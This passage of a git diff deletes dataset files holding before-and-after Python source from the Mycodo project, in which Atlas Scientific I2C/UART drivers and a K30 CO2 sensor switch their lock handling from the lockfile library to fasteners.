target=write_influxdb_value, - args=(self.unique_id, 'edge', rising_or_falling,)) - write_db.start() - - # Check sensor conditionals - for each_cond_id in self.cond_id: - if ((self.cond_is_activated[each_cond_id] and - self.cond_if_sensor_edge_select[each_cond_id] == 'edge') and - ((self.cond_if_sensor_edge_detected[each_cond_id] == 'rising' and - rising_or_falling == 1) or - (self.cond_if_sensor_edge_detected[each_cond_id] == 'falling' and - rising_or_falling == -1) or - self.cond_if_sensor_edge_detected[each_cond_id] == 'both')): - self.check_conditionals(each_cond_id) - - def setup_sensor_conditionals(self, cond_mod='setup'): - # Signal to pause the main loop and wait for verification - self.pause_loop = True - while not self.verify_pause_loop: - time.sleep(0.1) - - self.cond_id = {} - self.cond_action_id = {} - self.cond_name = {} - self.cond_is_activated = {} - self.cond_if_sensor_period = {} - self.cond_if_sensor_measurement = {} - self.cond_if_sensor_edge_select = {} - self.cond_if_sensor_edge_detected = {} - self.cond_if_sensor_gpio_state = {} - self.cond_if_sensor_direction = {} - self.cond_if_sensor_setpoint = {} - - sensor_conditional = db_retrieve_table_daemon( - Conditional) - sensor_conditional = sensor_conditional.filter( - Conditional.sensor_id == self.sensor_id) - sensor_conditional = sensor_conditional.filter( - Conditional.is_activated == True).all() - - if cond_mod == 'setup': - self.cond_timer = {} - self.smtp_wait_timer = {} - elif cond_mod == 'add': - self.logger.debug("Added Conditional") - elif cond_mod == 'del': - self.logger.debug("Deleted Conditional") - elif cond_mod == 'mod': - self.logger.debug("Modified Conditional") - else: - return 1 - - for each_cond in sensor_conditional: - if cond_mod == 'setup': - self.logger.info( - "Activated Conditional ({id})".format(id=each_cond.id)) - self.cond_id[each_cond.id] = each_cond.id - self.cond_is_activated[each_cond.id] = each_cond.is_activated - self.cond_if_sensor_period[each_cond.id] = each_cond.if_sensor_period - self.cond_if_sensor_measurement[each_cond.id] = each_cond.if_sensor_measurement - self.cond_if_sensor_edge_select[each_cond.id] = each_cond.if_sensor_edge_select - self.cond_if_sensor_edge_detected[each_cond.id] = each_cond.if_sensor_edge_detected - self.cond_if_sensor_gpio_state[each_cond.id] = each_cond.if_sensor_gpio_state - self.cond_if_sensor_direction[each_cond.id] = each_cond.if_sensor_direction - self.cond_if_sensor_setpoint[each_cond.id] = each_cond.if_sensor_setpoint - self.cond_timer[each_cond.id] = time.time() + each_cond.if_sensor_period - self.smtp_wait_timer[each_cond.id] = time.time() + 3600 - - self.pause_loop = False - self.verify_pause_loop = False - - def is_running(self): - return self.running - - def stop_controller(self): - self.thread_shutdown_timer = timeit.default_timer() - if self.device not in ['EDGE', 'ADS1x15', 'MCP342x']: - self.measure_sensor.stop_sensor() - self.running = False diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff deleted file mode 100644 index e9bb0a6..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.diff +++ /dev/null @@ -1,95 +0,0 @@ -diff --git a/mycodo/devices/atlas_scientific_i2c.py b/mycodo/devices/atlas_scientific_i2c.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/devices/atlas_scientific_i2c.py - +++ b/mycodo/devices/atlas_scientific_i2c.py -@@ -1,10 +1,11 @@ - # coding=utf-8 -+ -+import fasteners - import fcntl # used to access I2C parameters like addresses - import io # used to create file streams - import logging - import string # helps parse strings - import time # used for sleep delay and timestamps --from lockfile import LockFile - - from mycodo.utils.system_pi import str_is_float - -@@ -74,40 +75,40 @@ class AtlasScientificI2C: - """ Send command to board and read response """ - lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE, - dev=self.current_addr) -- lock = LockFile(lock_file_amend) - try: -- while not lock.i_am_locking(): -- try: -- lock.acquire(timeout=10) # wait up to 60 seconds before breaking lock -- except Exception as e: -- self.logger.error( -- "{cls} 10 second timeout, {lock} lock broken: " -- "{err}".format(cls=type(self).__name__, -- lock=ATLAS_PH_LOCK_FILE, -- err=e)) -- lock.break_lock() -- lock.acquire() -- -- # write a command to the board, wait the correct timeout, and read the response -- self.write(query_str) -- -- # the read and calibration commands require a longer timeout -- if ((query_str.upper().startswith("R")) or -- (query_str.upper().startswith("CAL"))): -- time.sleep(self.long_timeout) -- elif query_str.upper().startswith("SLEEP"): -- return "sleep mode" -+ lock = fasteners.InterProcessLock(lock_file_amend) -+ lock_acquired = False -+ -+ for i in range(600): -+ lock_acquired = lock.acquire(blocking=False) -+ if lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if lock_acquired: -+ # write a command to the board, wait the correct timeout, and read the response -+ self.write(query_str) -+ -+ # the read and calibration commands require a longer timeout -+ if ((query_str.upper().startswith("R")) or -+ (query_str.upper().startswith("CAL"))): -+ time.sleep(self.long_timeout) -+ elif query_str.upper().startswith("SLEEP"): -+ return "sleep mode" -+ else: -+ time.sleep(self.short_timeout) -+ -+ response = self.read() -+ lock.release() -+ return response - else: -- time.sleep(self.short_timeout) -+ self.logger.error("Could not acquire Atlas I2C lock") - -- response = self.read() -- lock.release() -- return response - except Exception as err: -- # self.logger.exception( -- # "{cls} raised an exception when taking a reading: " -- # "{err}".format(cls=type(self).__name__, err=err)) -- lock.release() -+ self.logger.debug( -+ "{cls} raised an exception when taking a reading: " -+ "{err}".format(cls=type(self).__name__, err=err)) - return "error", err - - def close(self): -@@ -188,5 +189,6 @@ def main(): - print("Query failed \n - Address may be invalid, use " - "List_addr command to see available addresses") - -+ - if __name__ == "__main__": - main() diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py deleted file mode 100644 index 5ed34d7..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.source.py +++ /dev/null @@ -1,192 +0,0 @@ -# coding=utf-8 -import fcntl # used to access I2C parameters like addresses -import io # used to create file streams -import logging -import string # helps parse strings -import time # used for sleep delay and timestamps -from lockfile import LockFile - -from mycodo.utils.system_pi import str_is_float - -from mycodo.config import ATLAS_PH_LOCK_FILE - - -class AtlasScientificI2C: - """Class for Atlas Scientific sensor communication via I2C""" - - long_timeout = 1.5 # the timeout needed to query readings and calibrations - short_timeout = .5 # timeout for regular commands - default_bus = 1 # the default bus for I2C on the newer Raspberry Pis, certain older boards use bus 0 - default_address = 98 # the default address for the sensor - - def __init__(self, i2c_address=default_address, i2c_bus=default_bus): - # open two file streams, one for reading and one for writing - # the specific I2C channel is selected with bus - # it is usually 1, except for older revisions where its 0 - # wb and rb indicate binary read and write - self.logger = logging.getLogger( - "mycodo.device.atlas_scientific_i2c_{add}".format(add=i2c_address)) - self.current_addr = i2c_address - self.setup = True - try: - self.file_read = io.open("/dev/i2c-" + str(i2c_bus), "rb", buffering=0) - self.file_write = io.open("/dev/i2c-" + str(i2c_bus), "wb", buffering=0) - - # initializes I2C to either a user specified or default address - self.set_i2c_address(i2c_address) - except Exception as err: - self.logger.exception( - "{cls} raised an exception when initializing: " - "{err}".format(cls=type(self).__name__, err=err)) - self.setup = False - - def set_i2c_address(self, addr): - # set the I2C communications to the slave specified by the address - # The commands for I2C dev using the ioctl functions are specified in - # the i2c-dev.h file from i2c-tools - i2c_slave = 0x703 - fcntl.ioctl(self.file_read, i2c_slave, addr) - fcntl.ioctl(self.file_write, i2c_slave, addr) - self.current_addr = addr - - def write(self, cmd): - # appends the null character and sends the string over I2C - cmd += "\00" - self.file_write.write(cmd) - - def read(self, num_of_bytes=31): - # reads a specified number of bytes from I2C, then parses and displays the result - res = self.file_read.read(num_of_bytes) # read from the board - response = filter(lambda x: x != '\x00', res) # remove the null characters to get the response - if ord(response[0]) == 1: # if the response isn't an error - # change MSB to 0 for all received characters except the first and get a list of characters - char_list = map(lambda x: chr(ord(x) & ~0x80), list(response[1:])) - # NOTE: having to change the MSB to 0 is a glitch in the raspberry pi, and you shouldn't have to do this! - str_float = ''.join(char_list) - if str_is_float(str_float): - return "success", ''.join(char_list) # convert the char list to a string and returns it - else: - return "error", "returned string does not represent a float value: {str}".format(str=str_float) - else: - return "error", str(ord(response[0])) - - def query(self, query_str): - """ Send command to board and read response """ - lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE, - dev=self.current_addr) - lock = LockFile(lock_file_amend) - try: - while not lock.i_am_locking(): - try: - lock.acquire(timeout=10) # wait up to 60 seconds before breaking lock - except Exception as e: - self.logger.error( - "{cls} 10 second timeout, {lock} lock broken: " - "{err}".format(cls=type(self).__name__, - lock=ATLAS_PH_LOCK_FILE, - err=e)) - lock.break_lock() - lock.acquire() - - # write a command to the board, wait the correct timeout, and read the response - self.write(query_str) - - # the read and calibration commands require a longer timeout - if ((query_str.upper().startswith("R")) or - (query_str.upper().startswith("CAL"))): - time.sleep(self.long_timeout) - elif query_str.upper().startswith("SLEEP"): - return "sleep mode" - else: - time.sleep(self.short_timeout) - - response = self.read() - lock.release() - return response - except Exception as err: - # self.logger.exception( - # "{cls} raised an exception when taking a reading: " - # "{err}".format(cls=type(self).__name__, err=err)) - lock.release() - return "error", err - - def close(self): - self.file_read.close() - self.file_write.close() - - def list_i2c_devices(self): - prev_addr = self.current_addr # save the current address so we can restore it after - i2c_devices = [] - for i in range(0, 128): - try: - self.set_i2c_address(i) - self.read() - i2c_devices.append(i) - except IOError: - pass - self.set_i2c_address(prev_addr) # restore the address we were using - return i2c_devices - - -def main(): - device = AtlasScientificI2C() - - print(">> Atlas Scientific sample code") - print(">> Any commands entered are passed to the board via I2C except:") - print(">> List_addr lists the available I2C addresses.") - print(">> Address,xx changes the I2C address the Raspberry Pi communicates with.") - print(">> Poll,xx.x command continuously polls the board every xx.x seconds") - print(" where xx.x is longer than the {to:.2f} second timeout.".format( - to=device.long_timeout)) - print(">> Pressing ctrl-c will stop the polling") - - while True: - input_str = raw_input("Enter command: ") - - if input_str.upper().startswith("LIST_ADDR"): - devices = device.list_i2c_devices() - for i in range(len(devices)): - print devices[i] - - # address command lets you change which address the Raspberry Pi will poll - elif input_str.upper().startswith("ADDRESS"): - addr = int(string.split(input_str, ',')[1]) - device.set_i2c_address(addr) - print("I2C address set to " + str(addr)) - - # continuous polling command automatically polls the board - elif input_str.upper().startswith("POLL"): - delay_time = float(string.split(input_str, ',')[1]) - - # check for polling time being too short, change it to the minimum timeout if too short - if delay_time < device.long_timeout: - print("Polling time is shorter than timeout, setting polling " - "time to {to:.2f}".format(to=device.long_timeout)) - delay_time = device.long_timeout - - # get the information of the board you're polling - info = string.split(device.query("I"), ",")[1] - print("Polling {sen} sensor every {sec:.2f} seconds, " - "press ctrl-c to stop polling".format( - sen=info, sec=delay_time)) - - try: - while True: - print(device.query("R")) - time.sleep(delay_time - device.long_timeout) - except KeyboardInterrupt: # catch ctrl-c - print("Continuous polling stopped") - - # if not a special keyword, pass commands straight to board - else: - if len(input_str) == 0: - print "Please input valid command." - else: - try: - print(device.query(input_str)) - except IOError: - print("Query failed \n - Address may be invalid, use " - "List_addr command to see available addresses") - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py deleted file mode 100644 index 03174db..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_i2c.py.target.py +++ /dev/null @@ -1,194 +0,0 @@ -# coding=utf-8 - -import fasteners -import fcntl # used to access I2C parameters like addresses -import io # used to create file streams -import logging -import string # helps parse strings -import time # used for sleep delay and timestamps - -from mycodo.utils.system_pi import str_is_float - -from mycodo.config import ATLAS_PH_LOCK_FILE - - -class AtlasScientificI2C: - """Class for Atlas Scientific sensor communication via I2C""" - - long_timeout = 1.5 # the timeout needed to query readings and calibrations - short_timeout = .5 # timeout for regular commands - default_bus = 1 # the default bus for I2C on the newer Raspberry Pis, certain older boards use bus 0 - default_address = 98 # the default address for the sensor - - def __init__(self, i2c_address=default_address, i2c_bus=default_bus): - # open two file streams, one for reading and one for writing - # the specific I2C channel is selected with bus - # it is usually 1, except for older revisions where its 0 - # wb and rb indicate binary read and write - self.logger = logging.getLogger( - "mycodo.device.atlas_scientific_i2c_{add}".format(add=i2c_address)) - self.current_addr = i2c_address - self.setup = True - try: - self.file_read = io.open("/dev/i2c-" + str(i2c_bus), "rb", buffering=0) - self.file_write = io.open("/dev/i2c-" + str(i2c_bus), "wb", buffering=0) - - # initializes I2C to either a user specified or default address - self.set_i2c_address(i2c_address) - except Exception as err: - self.logger.exception( - "{cls} raised an exception when initializing: " - "{err}".format(cls=type(self).__name__, err=err)) - self.setup = False - - def set_i2c_address(self, addr): - # set the I2C communications to the slave specified by the address - # The commands for I2C dev using the ioctl functions are specified in - # the i2c-dev.h file from i2c-tools - i2c_slave = 0x703 - fcntl.ioctl(self.file_read, i2c_slave, addr) - fcntl.ioctl(self.file_write, i2c_slave, addr) - self.current_addr = addr - - def write(self, cmd): - # appends the null character and sends the string over I2C - cmd += "\00" - self.file_write.write(cmd) - - def read(self, num_of_bytes=31): - # reads a specified number of bytes from I2C, then parses and displays the result - res = self.file_read.read(num_of_bytes) # read from the board - response = filter(lambda x: x != '\x00', res) # remove the null characters to get the response - if ord(response[0]) == 1: # if the response isn't an error - # change MSB to 0 for all received characters except the first and get a list of characters - char_list = map(lambda x: chr(ord(x) & ~0x80), list(response[1:])) - # NOTE: having to change the MSB to 0 is a glitch in the raspberry pi, and you shouldn't have to do this! - str_float = ''.join(char_list) - if str_is_float(str_float): - return "success", ''.join(char_list) # convert the char list to a string and returns it - else: - return "error", "returned string does not represent a float value: {str}".format(str=str_float) - else: - return "error", str(ord(response[0])) - - def query(self, query_str): - """ Send command to board and read response """ - lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE, - dev=self.current_addr) - try: - lock = fasteners.InterProcessLock(lock_file_amend) - lock_acquired = False - - for i in range(600): - lock_acquired = lock.acquire(blocking=False) - if lock_acquired: - break - else: - time.sleep(0.1) - - if lock_acquired: - # write a command to the board, wait the correct timeout, and read the response - self.write(query_str) - - # the read and calibration commands require a longer timeout - if ((query_str.upper().startswith("R")) or - (query_str.upper().startswith("CAL"))): - time.sleep(self.long_timeout) - elif query_str.upper().startswith("SLEEP"): - return "sleep mode" - else: - time.sleep(self.short_timeout) - - response = self.read() - lock.release() - return response - else: - self.logger.error("Could not acquire Atlas I2C lock") - - except Exception as err: - self.logger.debug( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=err)) - return "error", err - - def close(self): - self.file_read.close() - self.file_write.close() - - def list_i2c_devices(self): - prev_addr = self.current_addr # save the current address so we can restore it after - i2c_devices = [] - for i in range(0, 128): - try: - self.set_i2c_address(i) - self.read() - i2c_devices.append(i) - except IOError: - pass - self.set_i2c_address(prev_addr) # restore the address we were using - return i2c_devices - - -def main(): - device = AtlasScientificI2C() - - print(">> Atlas Scientific sample code") - print(">> Any commands entered are passed to the board via I2C except:") - print(">> List_addr lists the available I2C addresses.") - print(">> Address,xx changes the I2C address the Raspberry Pi communicates with.") - print(">> Poll,xx.x command continuously polls the board every xx.x seconds") - print(" where xx.x is longer than the {to:.2f} second timeout.".format( - to=device.long_timeout)) - print(">> Pressing ctrl-c will stop the polling") - - while True: - input_str = raw_input("Enter command: ") - - if input_str.upper().startswith("LIST_ADDR"): - devices = device.list_i2c_devices() - for i in range(len(devices)): - print devices[i] - - # address command lets you change which address the Raspberry Pi will poll - elif input_str.upper().startswith("ADDRESS"): - addr = int(string.split(input_str, ',')[1]) - device.set_i2c_address(addr) - print("I2C address set to " + str(addr)) - - # continuous polling command automatically polls the board - elif input_str.upper().startswith("POLL"): - delay_time = float(string.split(input_str, ',')[1]) - - # check for polling time being too short, change it to the minimum timeout if too short - if delay_time < device.long_timeout: - print("Polling time is shorter than timeout, setting polling " - "time to {to:.2f}".format(to=device.long_timeout)) - delay_time = device.long_timeout - - # get the information of the board you're polling - info = string.split(device.query("I"), ",")[1] - print("Polling {sen} sensor every {sec:.2f} seconds, " - "press ctrl-c to stop polling".format( - sen=info, sec=delay_time)) - - try: - while True: - print(device.query("R")) - time.sleep(delay_time - device.long_timeout) - except KeyboardInterrupt: # catch ctrl-c - print("Continuous polling stopped") - - # if not a special keyword, pass commands straight to board - else: - if len(input_str) == 0: - print "Please input valid command." - else: - try: - print(device.query(input_str)) - except IOError: - print("Query failed \n - Address may be invalid, use " - "List_addr command to see available addresses") - - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff deleted file mode 100644 index 2b0f09c..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.diff +++ /dev/null @@ -1,126 +0,0 @@ -diff --git a/mycodo/devices/atlas_scientific_uart.py b/mycodo/devices/atlas_scientific_uart.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/devices/atlas_scientific_uart.py - +++ b/mycodo/devices/atlas_scientific_uart.py -@@ -1,19 +1,20 @@ - # coding=utf-8 -+ -+import fasteners - import logging - import serial - import time --from lockfile import LockFile - from serial import SerialException - - from mycodo.config import ATLAS_PH_LOCK_FILE - --logger = logging.getLogger("mycodo.device.atlas_scientific_uart") -- - - class AtlasScientificUART: - """A Class to communicate with Atlas Scientific sensors via UART""" - - def __init__(self, serial_device, baudrate=9600): -+ self.logger = logging.getLogger( -+ "mycodo.device.atlas_scientific_uart_{dev}".format(dev=serial_device)) - self.setup = True - self.serial_device = serial_device - try: -@@ -21,11 +22,11 @@ class AtlasScientificUART: - baudrate=baudrate, - timeout=0) - except serial.SerialException as err: -- logger.exception( -+ self.logger.exception( - "{cls} raised an exception when initializing: " - "{err}".format(cls=type(self).__name__, err=err)) - self.setup = False -- logger.exception('Opening serial') -+ self.logger.exception('Opening serial') - - def read_line(self): - """ -@@ -48,29 +49,31 @@ class AtlasScientificUART: - """ Send command and return reply """ - lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE, - dev=self.serial_device.replace("/", "-")) -- lock = LockFile(lock_file_amend) -+ - try: -- while not lock.i_am_locking(): -- try: -- lock.acquire(timeout=10) # wait up to 10 seconds before breaking lock -- except Exception as e: -- logger.exception( -- "{cls} 10 second timeout, {lock} lock broken: " -- "{err}".format(cls=type(self).__name__, -- lock=lock_file_amend, -- err=e)) -- lock.break_lock() -- lock.acquire() -- self.send_cmd(query_str) -- time.sleep(1.3) -- response = self.read_lines() -- lock.release() -- return response -+ lock = fasteners.InterProcessLock(lock_file_amend) -+ lock_acquired = False -+ -+ for i in range(600): -+ lock_acquired = lock.acquire(blocking=False) -+ if lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if lock_acquired: -+ self.send_cmd(query_str) -+ time.sleep(1.3) -+ response = self.read_lines() -+ lock.release() -+ return response -+ else: -+ self.logger.error("Could not acquire Atlas UART lock") -+ - except Exception as err: -- logger.exception( -+ self.logger.exception( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=err)) -- lock.release() - return None - - def read_lines(self): -@@ -88,10 +91,10 @@ class AtlasScientificUART: - return lines - - except SerialException: -- logger.exception('Read Lines') -+ self.logger.exception('Read Lines') - return None - except AttributeError: -- logger.exception('UART device not initialized') -+ self.logger.exception('UART device not initialized') - return None - - def send_cmd(self, cmd): -@@ -106,10 +109,10 @@ class AtlasScientificUART: - self.ser.write(buf) - return True - except SerialException: -- logger.exception('Send CMD') -+ self.logger.exception('Send CMD') - return None - except AttributeError: -- logger.exception('UART device not initialized') -+ self.logger.exception('UART device not initialized') - return None - - -@@ -134,5 +137,6 @@ def main(): - except IOError: - print("Send command failed\n") - -+ - if __name__ == "__main__": - main() diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py deleted file mode 100644 index 880bd60..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.source.py +++ /dev/null @@ -1,138 +0,0 @@ -# coding=utf-8 -import logging -import serial -import time -from lockfile import LockFile -from serial import SerialException - -from mycodo.config import ATLAS_PH_LOCK_FILE - -logger = logging.getLogger("mycodo.device.atlas_scientific_uart") - - -class AtlasScientificUART: - """A Class to communicate with Atlas Scientific sensors via UART""" - - def __init__(self, serial_device, baudrate=9600): - self.setup = True - self.serial_device = serial_device - try: - self.ser = serial.Serial(port=serial_device, - baudrate=baudrate, - timeout=0) - except serial.SerialException as err: - logger.exception( - "{cls} raised an exception when initializing: " - "{err}".format(cls=type(self).__name__, err=err)) - self.setup = False - logger.exception('Opening serial') - - def read_line(self): - """ - taken from the ftdi library and modified to - use the ezo line separator "\r" - """ - lsl = len('\r') - line_buffer = [] - while True: - next_char = self.ser.read(1) - if next_char == '': - break - line_buffer.append(next_char) - if (len(line_buffer) >= lsl and - line_buffer[-lsl:] == list('\r')): - break - return ''.join(line_buffer) - - def query(self, query_str): - """ Send command and return reply """ - lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE, - dev=self.serial_device.replace("/", "-")) - lock = LockFile(lock_file_amend) - try: - while not lock.i_am_locking(): - try: - lock.acquire(timeout=10) # wait up to 10 seconds before breaking lock - except Exception as e: - logger.exception( - "{cls} 10 second timeout, {lock} lock broken: " - "{err}".format(cls=type(self).__name__, - lock=lock_file_amend, - err=e)) - lock.break_lock() - lock.acquire() - self.send_cmd(query_str) - time.sleep(1.3) - response = self.read_lines() - lock.release() - return response - except Exception as err: - logger.exception( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=err)) - lock.release() - return None - - def read_lines(self): - """ - also taken from ftdi lib to work with modified readline function - """ - lines = [] - try: - while True: - line = self.read_line() - if not line: - break - # self.ser.flush_input() - lines.append(line) - return lines - - except SerialException: - logger.exception('Read Lines') - return None - except AttributeError: - logger.exception('UART device not initialized') - return None - - def send_cmd(self, cmd): - """ - Send command to the Atlas Sensor. - Before sending, add Carriage Return at the end of the command. - :param cmd: - :return: - """ - buf = "{cmd}\r".format(cmd=cmd) # add carriage return - try: - self.ser.write(buf) - return True - except SerialException: - logger.exception('Send CMD') - return None - except AttributeError: - logger.exception('UART device not initialized') - return None - - -def main(): - device_str = raw_input("Device? (e.g. '/dev/ttyS0'): ") - baud_str = raw_input("Baud rate? (e.g. '9600'): ") - - device = AtlasScientificUART(device_str, baudrate=int(baud_str)) - - print(">> Atlas Scientific sample code") - print(">> Any commands entered are passed to the board via UART") - print(">> Pressing ctrl-c will stop the polling") - - while True: - input_str = raw_input("Enter command: ") - - if len(input_str) == 0: - print "Please input valid command." - else: - try: - print(device.query(input_str)) - except IOError: - print("Send command failed\n") - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py deleted file mode 100644 index 5d51f5b..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$devices$atlas_scientific_uart.py.target.py +++ /dev/null @@ -1,142 +0,0 @@ -# coding=utf-8 - -import fasteners -import logging -import serial -import time -from serial import SerialException - -from mycodo.config import ATLAS_PH_LOCK_FILE - - -class AtlasScientificUART: - """A Class to communicate with Atlas Scientific sensors via UART""" - - def __init__(self, serial_device, baudrate=9600): - self.logger = logging.getLogger( - "mycodo.device.atlas_scientific_uart_{dev}".format(dev=serial_device)) - self.setup = True - self.serial_device = serial_device - try: - self.ser = serial.Serial(port=serial_device, - baudrate=baudrate, - timeout=0) - except serial.SerialException as err: - self.logger.exception( - "{cls} raised an exception when initializing: " - "{err}".format(cls=type(self).__name__, err=err)) - self.setup = False - self.logger.exception('Opening serial') - - def read_line(self): - """ - taken from the ftdi library and modified to - use the ezo line separator "\r" - """ - lsl = len('\r') - line_buffer = [] - while True: - next_char = self.ser.read(1) - if next_char == '': - break - line_buffer.append(next_char) - if (len(line_buffer) >= lsl and - line_buffer[-lsl:] == list('\r')): - break - return ''.join(line_buffer) - - def query(self, query_str): - """ Send command and return reply """ - lock_file_amend = '{lf}.{dev}'.format(lf=ATLAS_PH_LOCK_FILE, - dev=self.serial_device.replace("/", "-")) - - try: - lock = fasteners.InterProcessLock(lock_file_amend) - lock_acquired = False - - for i in range(600): - lock_acquired = lock.acquire(blocking=False) - if lock_acquired: - break - else: - time.sleep(0.1) - - if lock_acquired: - self.send_cmd(query_str) - time.sleep(1.3) - response = self.read_lines() - lock.release() - return response - else: - self.logger.error("Could not acquire Atlas UART lock") - - except Exception as err: - self.logger.exception( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=err)) - return None - - def read_lines(self): - """ - also taken from ftdi lib to work with modified readline function - """ - lines = [] - try: - while True: - line = self.read_line() - if not line: - break - # self.ser.flush_input() - lines.append(line) - return lines - - except SerialException: - self.logger.exception('Read Lines') - return None - except AttributeError: - self.logger.exception('UART device not initialized') - return None - - def send_cmd(self, cmd): - """ - Send command to the Atlas Sensor. - Before sending, add Carriage Return at the end of the command. - :param cmd: - :return: - """ - buf = "{cmd}\r".format(cmd=cmd) # add carriage return - try: - self.ser.write(buf) - return True - except SerialException: - self.logger.exception('Send CMD') - return None - except AttributeError: - self.logger.exception('UART device not initialized') - return None - - -def main(): - device_str = raw_input("Device? (e.g. '/dev/ttyS0'): ") - baud_str = raw_input("Baud rate? (e.g. '9600'): ") - - device = AtlasScientificUART(device_str, baudrate=int(baud_str)) - - print(">> Atlas Scientific sample code") - print(">> Any commands entered are passed to the board via UART") - print(">> Pressing ctrl-c will stop the polling") - - while True: - input_str = raw_input("Enter command: ") - - if len(input_str) == 0: - print "Please input valid command." - else: - try: - print(device.query(input_str)) - except IOError: - print("Send command failed\n") - - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff deleted file mode 100644 index cff5b24..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.diff +++ /dev/null @@ -1,60 +0,0 @@ -diff --git a/mycodo/sensors/k30.py b/mycodo/sensors/k30.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/sensors/k30.py - +++ b/mycodo/sensors/k30.py -@@ -1,6 +1,6 @@ - # coding=utf-8 - --from lockfile import LockFile -+import fasteners - import logging - import serial - import time -@@ -92,30 +92,29 @@ class K30Sensor(AbstractSensor): - if not self.serial_device: # Don't measure if device isn't validated - return None - -- lock = LockFile(self.k30_lock_file) - try: -- # Acquire lock on K30 to ensure more than one read isn't -- # being attempted at once. -- while not lock.i_am_locking(): -- try: # wait 60 seconds before breaking lock -- lock.acquire(timeout=60) -- except Exception as e: -- self.logger.error( -- "{cls} 60 second timeout, {lock} lock broken: " -- "{err}".format( -- cls=type(self).__name__, -- lock=self.k30_lock_file, -- err=e)) -- lock.break_lock() -- lock.acquire() -- self._co2 = self.get_measurement() -- lock.release() -+ lock = fasteners.InterProcessLock(self.k30_lock_file) -+ lock_acquired = False -+ -+ for i in range(600): -+ lock_acquired = lock.acquire(blocking=False) -+ if lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if lock_acquired: -+ self._co2 = self.get_measurement() -+ lock.release() -+ else: -+ self.logger.error("Could not acquire K30 lock") -+ - if self._co2 is None: - return 1 - return # success - no errors -+ - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) -- lock.release() - return 1 diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py deleted file mode 100644 index 29769e6..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$k30.py.source.py +++ /dev/null @@ -1,121 +0,0 @@ -# coding=utf-8 - -from lockfile import LockFile -import logging -import serial -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class K30Sensor(AbstractSensor): - """ A sensor support class that monitors the K30's CO2 concentration """ - - def __init__(self, device_loc, baud_rate=9600): - super(K30Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.k30.{dev}".format(dev=device_loc.replace('/', ''))) - self.k30_lock_file = None - self._co2 = 0 - - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - self.k30_lock_file = "/var/lock/sen-k30-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - 